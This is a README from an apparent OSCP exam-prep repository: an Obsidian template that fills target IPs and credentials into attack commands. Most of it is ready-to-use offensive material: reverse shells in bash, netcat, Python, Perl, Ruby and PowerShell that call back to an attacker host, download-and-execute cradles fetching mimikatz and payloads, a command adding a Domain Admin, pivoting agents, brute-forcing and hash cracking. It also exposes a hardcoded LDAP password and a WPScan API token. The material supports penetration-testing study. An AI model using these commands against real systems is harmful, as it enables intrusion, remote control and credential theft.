├── README.md └── aliases.md /README.md: -------------------------------------------------------------------------------- 1 | OSCP 2 | 3 | I used the Templater community plugin in obsidian to automatically populate IP,username,password Thanks siddicky for this cool idea! 4 | 5 | I do have plans to actively maintain it if people like it 6 | 7 | https://www.youtube.com/watch?v=2NLi4wzAvTw&t=634s 8 | 9 | Have a look at this video, if youre wondering what im talking about! 10 | 11 | Steps to use- 12 | 13 | 1-> Download obsidian, click on settings and browse "community plugins" 14 | 15 | 2-> Install the Templater plugin by SilentVoid and enable the plugin 16 | 17 | 3-> Copy the template and save 18 | 19 | 4->Create a new .md file and put in your desired values 20 | 21 | 22 | 23 | ``` 24 | hyphenhyphenhyphen 25 | 26 | LHOST: 1.1.1.1 27 | RHOST: 0.0.0.0 28 | USERNAME: username 29 | PASSWORD: password 30 | DOMAIN: domain 31 | 32 | hyphenhyphenhyphen 33 | 34 | ``` 35 | 36 | Always make sure you have source mode enabled, else this wont work! 37 | ![test](https://media.discordapp.net/attachments/1146454908539769002/1149737116167852122/image.png?width=1602&height=720) 38 | 39 | ![test](https://cdn.discordapp.com/attachments/1125391842125549601/1149407842885980190/image.png) 40 | 41 | 42 | 43 | 5->press alt+e and select your template name 44 | 45 | BOOM 46 | 47 | To change the IP, i would either prefer ctrl + z or just create a new file with the method above ^ 48 | 49 | ## Shells & stuff 50 | https://www.revshells.com/ 51 | 52 | ```bash 53 | 54 | # Get-NTLM from password 55 | python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "<% tp.frontmatter["PASSWORD"] %>".encode("utf-16le")).digest())' 56 | 57 | 58 | powershell "IEX(New-Object Net.Webclient).downloadString('http://<% tp.frontmatter["LHOST"] %>:/Invoke-PowerShellTcp.ps1')" 59 | 60 | 61 | # php cmd 62 | 63 | 64 | 65 | 66 | 67 | 68 |

 69 | 
 72 |

73 | 74 | #enabling RDP 75 | Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0** 76 | 77 | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 78 | Enable-NetFirewallRule -DisplayGroup "Remote Desktop" 79 | 80 | 81 | # ConPtyShell 82 | https://github.com/antonioCoco/ConPtyShell 83 | stty raw -echo 84 | 85 | certutil -urlcache -split -f http://<% tp.frontmatter["LHOST"] %>:8000/Others/ConPtyShell/Invoke-ConPtyShell.ps1 86 | certutil -urlcache -split -f http://<% tp.frontmatter["LHOST"] %>:8000/Others/ConPtyShell/ConPtyShell.exe 87 | 88 | 89 | . ./Invoke-ConPtyShell.ps1 90 | # exe 91 | stty raw -echo; (stty size; cat) | nc -lvnp 3001 92 | Invoke-ConPtyShell <% tp.frontmatter["LHOST"] %> 3001 93 | ./ConPtyShell.exe <% tp.frontmatter["LHOST"] %> 3001 94 | 95 | #manual upgrade 96 | Invoke-ConPtyShell -Upgrade -Rows 23 -Cols 115 97 | 98 | 99 | # Execute Command as another user 100 | PS C:\> $SecurePassword = ConvertTo-SecureString '<% tp.frontmatter["PASSWORD"] %>' -AsPlainText -Force 101 | PS C:\> $Cred = New-Object System.Management.Automation.PSCredential('<% tp.frontmatter["USERNAME"] %>', $SecurePassword) 102 | PS C:\> $Session = New-PSSession -Credential $Cred 103 | PS C:\> Invoke-Command -Session $session -scriptblock { whoami } 104 | 105 | or 106 | $username = '<% tp.frontmatter["USERNAME"] %>' 107 | $password = '<% tp.frontmatter["PASSWORD"] %>' 108 | $securePassword = ConvertTo-SecureString $password -AsPlainText -Force 109 | $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword 110 | Start-Process powershell.exe -Credential $credential 111 | 112 | powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *" 113 | 114 | 115 | # Add new Domain Admin 116 | $PASSWORD= ConvertTo-SecureString –AsPlainText -Force -String <% tp.frontmatter["PASSWORD"] %> 117 | New-ADUser -Name "<% tp.frontmatter["USERNAME"] %>" -Description "" -Enabled $true -AccountPassword $PASSWORD 118 | Add-ADGroupMember -Identity "Domain Admins" -Member <% tp.frontmatter["USERNAME"] %> 119 | 120 | #Execute Command in User Context 121 | $pass = ConvertTo-SecureString "<% tp.frontmatter["PASSWORD"] %>" -AsPlaintext -Force 122 | $cred = New-Object System.Management.Automation.PSCredential ("<% tp.frontmatter["DOMAIN"] %>\<% tp.frontmatter["USERNAME"] %>", $pass) 123 | Invoke-Command -computername -ConfigurationName dc_manage -credential $cred -command {whoami} 124 | 125 | #Execute Scripts with Creds (Reverse Shell) 126 | $pass = ConvertTo-SecureString "<% tp.frontmatter["PASSWORD"] %>" -AsPlainText -Force 127 | $cred = New-Object System.Management.Automation.PSCredential("<% tp.frontmatter["DOMAIN"] %>\<% tp.frontmatter["USERNAME"] %>", $pass) 128 | Invoke-Command -Computer <% tp.frontmatter["RHOST"] %> -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://<% tp.frontmatter["LHOST"] %>/.ps1') } -Credential $cred 129 | 130 | 131 | ``` 132 | 133 | 134 | ## Reverse shell 135 | ```bash 136 | 137 | #reverse shell 138 | bash -i >& /dev/tcp/<% tp.frontmatter["LHOST"] %>/ 0>&1 139 | bash -c 'bash -i >& /dev/tcp/<% tp.frontmatter["LHOST"] %>/ 0>&1' 140 | echo -n '/bin/bash -c "bin/bash -i >& /dev/tcp/<% tp.frontmatter["LHOST"] %>/ 0>&1"' | base64 141 | 142 | # curl Reverse shell 143 | curl --header "Content-Type: application/json" --request POST http://<% tp.frontmatter["RHOST"] %>:/upload --data '{"auth": {"name": "<% tp.frontmatter["USERNAME"] %>", "password": "<% tp.frontmatter["PASSWORD"] %>"}, "filename" : "& echo "bash -i >& /dev/tcp/<% tp.frontmatter["LHOST"] %>/ 0>&1"|base64 -d|bash"}' 144 | 145 | #mkfifo Reverse shell 146 | mkfifo /tmp/shell; nc <% tp.frontmatter["LHOST"] %> 0/tmp/shell 2>&1; rm /tmp/shell 147 | 148 | #netcat reverse shell 149 | nc -e /bin/sh <% tp.frontmatter["LHOST"] %> 150 | 151 | #perl reverse shell 152 | perl -e 'use Socket;$i="<% tp.frontmatter["LHOST"] %>";$p=;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 153 | 154 | #PHP reverse shell 155 | php -r '$sock=fsockopen("<% tp.frontmatter["LHOST"] %>",);exec("/bin/sh -i <&3 >&3 2>&3");' 156 | 157 | #msfvenom 158 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=<% tp.frontmatter["LHOST"] %> LPORT=4444 -f exe -o reverse.exe 159 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=<% tp.frontmatter["LHOST"] %> LPORT=4444 -f dll -o reverse.dll 160 | 161 | #Powershell Reverse shell 162 | $client = New-Object System.Net.Sockets.TCPClient('<% tp.frontmatter["LHOST"] %>',);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() 163 | 164 | powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<% tp.frontmatter["LHOST"] %>',);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" 165 | 166 | powershell -nop -exec bypass -c '$client = New-Object System.Net.Sockets.TCPClient("<% tp.frontmatter["LHOST"] %>",);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' 167 | 168 | $Text = '$client = New-Object System.Net.Sockets.TCPClient("<% tp.frontmatter["LHOST"] %>",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' 169 | $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text) 170 | $EncodedText =[Convert]::ToBase64String($Bytes) 171 | $EncodedText 172 | 173 | #python reverse shell 174 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<% tp.frontmatter["LHOST"] %>",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 175 | 176 | python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<% tp.frontmatter["LHOST"] %>",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 177 | 178 | python -c 'import pty,subprocess,os,time;(master,slave)=pty.openpty();p=subprocess.Popen(["/bin/su","-c","id","bynarr"],stdin=slave,stdout=slave,stderr=slave);os.read(master,1024);os.write(master,"fruity\n");time.sleep(0.1);print os.read(master,1024);' 179 | 180 | #ruby reverse shell 181 | ruby -rsocket -e'f=TCPSocket.open("<% tp.frontmatter["LHOST"] %>",).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 182 | 183 | # nishang 184 | cd path/to/nishang/Shells/ 185 | cp Invoke-PowerShellTcp.ps1 Invoke-PowerShellTcp.ps1 186 | Invoke-PowerShellTcp -Reverse -IPAddress <% tp.frontmatter["LHOST"] %> -Port 187 | 188 | ``` 189 | 190 | ## File Sharing 191 | ```bash 192 | ## File Sharing 193 | 194 | certutil -urlcache -split -f http://<% tp.frontmatter["LHOST"] %>:8000/reverse.exe 195 | certutil -urlcache -split -f http://<% tp.frontmatter["LHOST"] %>:8000/Linux/linpeas.sh 196 | certutil -urlcache -split -f http://<% tp.frontmatter["LHOST"] %>:8000/Windows/ 197 | certutil -urlcache -split -f http://<% tp.frontmatter["LHOST"] %>:8000/Windows/mimikatz/mimikatz.exe 198 | certutil -urlcache -split -f http://<% tp.frontmatter["LHOST"] %>:8000/Windows/exe/winPEASany.exe 199 | 200 | c:/users/public/ 201 | 202 | 203 | impacket-smbserver test /home/rachit -smb2support -user joe -password joe 204 | net use m: \\<% tp.frontmatter["LHOST"] %>\test /user:joe joe /persistent:yes 205 | copy * \\<% tp.frontmatter["LHOST"] %>\test 206 | smbserver.py -smb2support test . 207 | 208 | 209 | iwr -uri <% tp.frontmatter["LHOST"] %>:8000/ -Outfile 210 | IEX(IWR http://<% tp.frontmatter["LHOST"] %>/) -UseBasicParsing 211 | powershell -command Invoke-WebRequest -Uri http://<% tp.frontmatter["LHOST"] %>:/ -Outfile C:\\temp\\ 212 | Invoke-Expression (Invoke-WebRequest http://.ps1) 213 | 214 | 215 | wget http://<% tp.frontmatter["LHOST"] %>/ 216 | wget -r --no-parent http://<% tp.frontmatter["LHOST"] %>/ 217 | wget -m http://<% tp.frontmatter["LHOST"] %>/ 218 | 219 | curl http://<% tp.frontmatter["LHOST"] %>/ > 220 | 221 | #MSF 222 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<% tp.frontmatter["LHOST"] %> LPORT= -f exe -o .exe 223 | 224 | msf6 > use exploit/multi/handler 225 | [*] Using configured payload generic/shell_reverse_tcp 226 | msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp 227 | payload => windows/x64/meterpreter/reverse_tcp 228 | msf6 exploit(multi/handler) > set LHOST <% tp.frontmatter["LHOST"] %> 229 | LHOST => <% tp.frontmatter["LHOST"] %> 230 | msf6 exploit(multi/handler) > set LPORT 231 | LPORT => 232 | msf6 exploit(multi/handler) > run 233 | 234 | .\.exe 235 | 236 | meterpreter > download * 237 | ``` 238 | 239 | 240 | 241 | ## Tools 242 | ```bash 243 | # nmapAutomator 244 | ./nmapAutomator.sh -H <% tp.frontmatter["RHOST"] %> -T All 245 | 246 | #nmap 247 | sudo nmap -A -T4 -sC -sV -p- <% tp.frontmatter["RHOST"] %> 248 | sudo nmap -sV -sU <% tp.frontmatter["RHOST"] %> 249 | sudo nmap -A -T4 -sC -sV --script vuln <% tp.frontmatter["RHOST"] %> 250 | sudo nmap -A -T4 -p- -sS -sV -oN initial --script discovery <% tp.frontmatter["RHOST"] %> 251 | sudo nmap -sC -sV -p- --scan-delay 5s <% tp.frontmatter["RHOST"] %> 252 | sudo nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test' <% tp.frontmatter["RHOST"] %> 253 | ls -lh /usr/share/nmap/scripts/*ssh* 254 | locate -r '\.nse$' | xargs grep categories | grep categories | grep 'default\|version\|safe' | grep smb 255 | 256 | # evil-winrm 257 | evil-winrm -i <% tp.frontmatter["RHOST"] %> -u '<% tp.frontmatter["USERNAME"] %>' -p '<% tp.frontmatter["PASSWORD"] %>' 258 | evil-winrm -i <% tp.frontmatter["RHOST"] %> -u '<% tp.frontmatter["USERNAME"] %>' -H '' 259 | 260 | # xfreerdp 261 | xfreerdp /v:<% tp.frontmatter["RHOST"] %> /u:<% tp.frontmatter["USERNAME"] %> /p:<% tp.frontmatter["PASSWORD"] %> /dynamic-resolution +clipboard 262 | xfreerdp /v:<% tp.frontmatter["RHOST"] %> /u:<% tp.frontmatter["USERNAME"] %> /d:<% tp.frontmatter["DOMAIN"] %> /pth:'' /dynamic-resolution +clipboard 263 | 264 | # smbclient 265 | smbclient -L \\<% tp.frontmatter["RHOST"] %>\ -N 266 | smbclient -L //<% tp.frontmatter["RHOST"] %>/ -N 267 | smbclient -L ////<% tp.frontmatter["RHOST"] %>/ -N 268 | smbclient -U "<% tp.frontmatter["USERNAME"] %>" -L \\\\<% tp.frontmatter["RHOST"] %>\\ 269 | smbclient -L //<% tp.frontmatter["RHOST"] %>// -U <% tp.frontmatter["USERNAME"] %>%<% tp.frontmatter["PASSWORD"] %> 270 | smbclient //<% tp.frontmatter["RHOST"] %>/SYSVOL -U <% tp.frontmatter["USERNAME"] %>%<% tp.frontmatter["PASSWORD"] %> 271 | smbclient "\\\\<% tp.frontmatter["RHOST"] %>\" 272 | smbclient \\\\<% tp.frontmatter["RHOST"] %>\\ -U '<% tp.frontmatter["USERNAME"] %>' --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000 273 | smbclient --no-pass //<% tp.frontmatter["RHOST"] %>/ 274 | mount.cifs //<% tp.frontmatter["RHOST"] %>/ /mnt/remote 275 | guestmount --add '//' --inspector --ro /mnt/ -v 276 | 277 | mask"" 278 | recurse ON 279 | prompt OFF 280 | mget * 281 | 282 | 283 | # snmpwalk 284 | snmpwalk -c public -v1 <% tp.frontmatter["RHOST"] %> 285 | snmpwalk -v2c -c public <% tp.frontmatter["RHOST"] %> 1.3.6.1.2.1.4.34.1.3 286 | snmpwalk -v2c -c public <% tp.frontmatter["RHOST"] %> .1 287 | snmpwalk -v2c -c public <% tp.frontmatter["RHOST"] %> nsExtendObjects 288 | snmpwalk -c public -v1 <% tp.frontmatter["RHOST"] %> 1.3.6.1.4.1.77.1.2.25 289 | snmpwalk -c public -v1 <% tp.frontmatter["RHOST"] %> 1.3.6.1.2.1.25.4.2.1.2 290 | snmpwalk -c public -v1 <% tp.frontmatter["RHOST"] %> .1.3.6.1.2.1.1.5 291 | snmpwalk -c public -v1 <% tp.frontmatter["RHOST"] %> 1.3.6.1.4.1.77.1.2.3.1.1 292 | snmpwalk -c public -v1 <% tp.frontmatter["RHOST"] %> 1.3.6.1.4.1.77.1.2.27 293 | snmpwalk -c public -v1 <% tp.frontmatter["RHOST"] %> 1.3.6.1.2.1.6.13.1.3 294 | snmpwalk -c public -v1 <% tp.frontmatter["RHOST"] %> 1.3.6.1.2.1.25.6.3.1.2 295 | 296 | 1.3.6.1.2.1.25.1.6.0 System Processes 297 | 1.3.6.1.2.1.25.4.2.1.2 Running Programs 298 | 1.3.6.1.2.1.25.4.2.1.4 Processes Path 299 | 1.3.6.1.2.1.25.2.3.1.4 Storage Units 300 | 1.3.6.1.2.1.25.6.3.1.2 Software Name 301 | 1.3.6.1.4.1.77.1.2.25 User Accounts 302 | 1.3.6.1.2.1.6.13.1.3 TCP Local Ports 303 | 304 | 305 | # crackmapexec 306 | 307 | # Dont forget to use 308 | --local-auth 309 | 310 | crackmapexec smb <% tp.frontmatter["RHOST"] %> -u "" -p "" --shares 311 | crackmapexec smb <% tp.frontmatter["RHOST"] %> -u "<% tp.frontmatter["USERNAME"] %>" -p "<% tp.frontmatter["PASSWORD"] %>" --shares 312 | crackmapexec smb <% tp.frontmatter["RHOST"] %> -u "" -p "" --shares -M spider_plus 313 | crackmapexec ssh <% tp.frontmatter["RHOST"] %> -u "<% tp.frontmatter["USERNAME"] %>" -p "<% tp.frontmatter["PASSWORD"] %>" --continue-on-success 314 | crackmapexec ftp <% tp.frontmatter["RHOST"] %> -u "<% tp.frontmatter["USERNAME"] %>" -p "<% tp.frontmatter["PASSWORD"] %>" --continue-on-success 315 | crackmapexec mssql <% tp.frontmatter["RHOST"] %> -u "<% tp.frontmatter["USERNAME"] %>" -p "<% tp.frontmatter["PASSWORD"] %>" 316 | crackmapexec winrm <% tp.frontmatter["RHOST"] %> -u "<% tp.frontmatter["USERNAME"] %>" -p '<% tp.frontmatter["PASSWORD"] %>' -d <% tp.frontmatter["DOMAIN"] %> --continue-on-success 317 | crackmapexec winrm <% tp.frontmatter["RHOST"] %> -u "<% tp.frontmatter["USERNAME"] %>" -H '' -d <% tp.frontmatter["DOMAIN"] %> --continue-on-success 318 | 319 | # Kerbrute 320 | ./kerbrute userenum -d <% tp.frontmatter["DOMAIN"] %> --dc <% tp.frontmatter["DOMAIN"] %> /PATH/TO/FILE/ 321 | ./kerbrute passwordspray -d <% tp.frontmatter["DOMAIN"] %> --dc <% tp.frontmatter["DOMAIN"] %> /PATH/TO/FILE/ <% tp.frontmatter["PASSWORD"] %> 322 | 323 | 324 | #ldap 325 | ldapsearch -x -w <% tp.frontmatter["PASSWORD"] %> 326 | ldapsearch -x -H ldap://<% tp.frontmatter["RHOST"] %> -s base namingcontexts 327 | ldapsearch -x -b "dc=<% tp.frontmatter["DOMAIN"] %>,dc=offsec" "*" -H ldap://<% tp.frontmatter["RHOST"] %> | awk '/dn: / {print $2}' 328 | ldapsearch -x -D "cn=admin,dc=<% tp.frontmatter["DOMAIN"] %>,dc=offsec" -s sub "cn=*" -H ldap://<% tp.frontmatter["RHOST"] %> | awk '/uid: /{print $2}' | nl 329 | ldapsearch -D "cn=admin,dc=acme,dc=com" "(objectClass=*)" -w ldapadmin -h ldap.acme.com 330 | ldapsearch -x -H ldap://<% tp.frontmatter["RHOST"] %> -D "<% tp.frontmatter["USERNAME"] %>" -b "dc=<% tp.frontmatter["DOMAIN"] %>,dc=offsec" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd 331 | ldapsearch -H ldap://<% tp.frontmatter["DOMAIN"] %> -b "DC=<% tp.frontmatter["DOMAIN"] %>,DC=local" > .txt 332 | 333 | 334 | 335 | ldapsearch -x -H ldap://dc.support.htb -D 'SUPPORT\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "CN=Users,DC=SUPPORT,DC=HTB" | tee ldap_dc.support.htb.txt 336 | ldapdomaindump -u 'support\ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' dc.support.htb 337 | 338 | 339 | 340 | 341 | # Get computers 342 | python3 windapsearch.py --dc-ip <% tp.frontmatter["RHOST"] %> -u <% tp.frontmatter["USERNAME"] %>@domain.local -p <% tp.frontmatter["PASSWORD"] %> --computers 343 | # Get groups 344 | python3 windapsearch.py --dc-ip <% tp.frontmatter["RHOST"] %> -u <% tp.frontmatter["USERNAME"] %>@domain.local -p <% tp.frontmatter["PASSWORD"] %> --groups 345 | # Get users 346 | python3 windapsearch.py --dc-ip <% tp.frontmatter["RHOST"] %> -u <% tp.frontmatter["USERNAME"] %>@domain.local -p <% tp.frontmatter["PASSWORD"] %> --da 347 | # Get Domain Admins 348 | python3 windapsearch.py --dc-ip <% tp.frontmatter["RHOST"] %> -u <% tp.frontmatter["USERNAME"] %>@domain.local -p <% tp.frontmatter["PASSWORD"] %> --da 349 | # Get Privileged Users 350 | python3 windapsearch.py --dc-ip <% tp.frontmatter["RHOST"] %> -u <% tp.frontmatter["USERNAME"] %>@domain.local -p <% tp.frontmatter["PASSWORD"] %> --privileged-users 351 | 352 | 353 | #powercat 354 | powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<% tp.frontmatter["LHOST"] %>/powercat.ps1');powercat -c <% tp.frontmatter["LHOST"] %> -p -e cmd" 355 | 356 | #adpeas 357 | Import-Module .\adPEAS.ps1 358 | . .\adPEAS.ps1 359 | Invoke-adPEAS 360 | Invoke-adPEAS -Domain '<% tp.frontmatter["DOMAIN"] %>' -Outputfile 'C:\temp\adPEAS_outputfile' -NoColor 361 | 362 | #### Certipy 363 | certipy find -dc-ip <% tp.frontmatter["PASSWORD"] %> -u <% tp.frontmatter["USERNAME"] %>@<% tp.frontmatter["DOMAIN"] %> -p <% tp.frontmatter["PASSWORD"] %> 364 | certipy find -dc-ip <% tp.frontmatter["PASSWORD"] %> -u <% tp.frontmatter["USERNAME"] %> -p <% tp.frontmatter["PASSWORD"] %> -vulnerable -stdout 365 | 366 | #rpcclient 367 | rpcclient -U "" <% tp.frontmatter["RHOST"] %> 368 | 369 | # msfvenom && metasploit execution 370 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=<% tp.frontmatter["LHOST"] %> LPORT= -b "\x00\x0a" -a x86 --platform windows -f exe -o exploit.exe 371 | 372 | msf6 > use exploit/multi/handler 373 | msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp 374 | msf6 exploit(multi/handler) > set LHOST <% tp.frontmatter["LHOST"] %> 375 | msf6 exploit(multi/handler) > set LPORT <% tp.frontmatter["LHOST"] %> 376 | msf6 exploit(multi/handler) > run 377 | 378 | .\exploit.exe 379 | ``` 380 | 381 | 382 | ## Pivoting 383 | ```bash 384 | #ligolo 385 | 386 | certutil -urlcache -split -f http://<% tp.frontmatter["LHOST"] %>:8000/Windows/Ligolo/agent.exe 387 | 388 | sudo ip tuntap add user root mode tun ligolo 389 | sudo ip link set ligolo up 390 | # LHOST machine 391 | ./proxy -selfcert 392 | # RHOST machine 393 | ./agent -ignore-cert -connect <% tp.frontmatter["LHOST"] %>:11601 394 | ./agent.exe -ignore-cert -connect <% tp.frontmatter["LHOST"] %>:11601 395 | #route 396 | sudo ip route add x.x.x.x dev ligolo 397 | 398 | help command 399 | listener_add --addr 0.0.0.0:8000 --to 127.0.0.1:7777 --tcp 400 | 401 | 402 | #chisel 403 | #Run command on attacker machine 404 | chisel server -p 8001 --reverse 405 | #Run command on Web Server machine 406 | . .\chisel.exe client <% tp.frontmatter["LHOST"] %>:8001 R:1080:socks 407 | and edit the proxychains with the port that chisel provided 408 | ``` 409 | 410 | 411 | ## Protocols 412 | ``` 413 | # SSH 414 | ssh user@<% tp.frontmatter["RHOST"] %> -oKexAlgorithms=+diffie-hellman-group1-sha1 415 | ssh -i key.pem user@<% tp.frontmatter["RHOST"] %> 416 | 417 | ../../../../../../../../../home/<% tp.frontmatter["USERNAME"] %>/.ssh/id_rsa 418 | 419 | hydra -v -V -u -L users -P password -t 1 -u <% tp.frontmatter["RHOST"] %> ssh 420 | 421 | #FTP 422 | wget-m --no-passive ftp://<% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %>@<% tp.frontmatter["LHOST"] %> 423 | wget -r ftp://<% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %>@example.com/remote/dir/ 424 | 425 | ``` 426 | 427 | `` 428 | ## Fuzzing/Bruteforcing 429 | ```bash 430 | 431 | # common file extensions 432 | txt,bak,php,html,js,asp,aspx 433 | 434 | # common picture extensions 435 | png,jpg,jpeg,gif,bmp 436 | 437 | # feroxbuster 438 | feroxbuster -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt --url http://<% tp.frontmatter["RHOST"] %>/ -x php,aspx,jsp,pdf -C 404,401,403 --output brute.txt 439 | 440 | # Gobuster 441 | gobuster dir -u http://<% tp.frontmatter["RHOST"] %>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 442 | 443 | # API Fuzzing 444 | ffuf -u https://<% tp.frontmatter["RHOST"] %>/api/v2/FUZZ -w api_seen_in_wild.txt -c -ac -t 250 -fc 400,404,412 445 | 446 | # File Extensions 447 | ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://<% tp.frontmatter["RHOST"] %>/cd/ext/logs/FUZZ -e .log 448 | 449 | # Searching for LFI 450 | ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://<% tp.frontmatter["RHOST"] %>/admin../admin_staging/index.php?page=FUZZ -fs 15349 451 | 452 | # WPScan 453 | wpscan --url https://<% tp.frontmatter["RHOST"] %> --enumerate u,t,p 454 | wpscan --url https://<% tp.frontmatter["RHOST"] %> --plugins-detection aggressive 455 | wpscan --url https://<% tp.frontmatter["RHOST"] %> --disable-tls-checks 456 | wpscan --url https://<% tp.frontmatter["RHOST"] %> --disable-tls-checks --enumerate u,t,p 457 | wpscan --url http://<% tp.frontmatter["RHOST"] %> -U <% tp.frontmatter["USERNAME"] %> -P passwords.txt -t 50 458 | wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://<% tp.frontmatter["RHOST"] %> --plugins-detection aggressive 459 | 460 | 461 | wpscan --url [http://192.168.243.244](http://192.168.243.244) --enumerate p --plugins-detection aggressive --api-token qLVQId1c9vb4suVQzft2zhHusr9BsSaSpxcanRW6qSA 462 | 463 | 464 | 465 | 466 | # Hydra 467 | hydra <% tp.frontmatter["RHOST"] %> -l <% tp.frontmatter["USERNAME"] %> -P /usr/share/wordlists/ ftp|ssh|smb://<% tp.frontmatter["RHOST"] %> 468 | hydra -l <% tp.frontmatter["USERNAME"] %> -P /usr/share/wordlists/rockyou.txt <% tp.frontmatter["RHOST"] %> http-post-form "/admin.php:username=^USER^&password=^PASS^:login_error" 469 | 470 | sudo hydra -L /usr/share/wordlists/rockyou.txt -p "<% tp.frontmatter["PASSWORD"] %>" rdp://<% tp.frontmatter["RHOST"] %> 471 | sudo hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://<% tp.frontmatter["RHOST"] %> 472 | 473 | #crowbar 474 | # RDP brute forcing a single IP address using a single username and a single password: 475 | ./crowbar.py -b rdp -s <% tp.frontmatter["RHOST"] %>/32 -u admin -c Aa123456 476 | # username list and a single password 477 | ./crowbar.py -b rdp -s <% tp.frontmatter["RHOST"] %>/32 -U ~/Desktop/userlist -c passw0rd 478 | # username and a single password list 479 | ./crowbar.py -b rdp -s <% tp.frontmatter["RHOST"] %>/32 -u localuser -C ~/Desktop/passlist 480 | # username list and password list 481 | ./crowbar.py -b rdp -s <% tp.frontmatter["RHOST"] %>/24 -U ~/Desktop/userlist -C ~/Desktop/passlist -d 482 | ``` 483 | 484 | 485 | ### Cracking 486 | ```bash 487 | # Hashcat 488 | 489 | Asrep Roast 490 | hashcat -m 18200 -a 0 491 | sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force 492 | hashcat -m 18200-a 0asrep.txt passwords.txt --outfile asrepcrack.txt --forcehashcat 493 | 494 | Kerberoast 495 | hashcat -m 13100 --force 496 | sudo hashcat -m 13100 hashes.kerberoast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force 497 | 498 | 499 | #keypass 500 | keepass2<% tp.frontmatter["USERNAME"] %> Database.kdbx > keepass.hash 501 | hashcat --help | grep -i "KeePass" 502 | hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force 503 | 504 | #id_rsa 505 | ssh2<% tp.frontmatter["USERNAME"] %> id_rsa > ssh.hash 506 | hashcat -h | grep -i "ssh" 507 | hashcat -m 22921 ssh.hash ssh.passwords -r ssh.rule --force 508 | hashcat -m 22921 ssh.hash /usr/share/wordlists/rockyou.txt 509 | 510 | #ntlm 511 | hashcat --help | grep -i "ntlm" 512 | hashcat -m 1000 hashes.dcsync 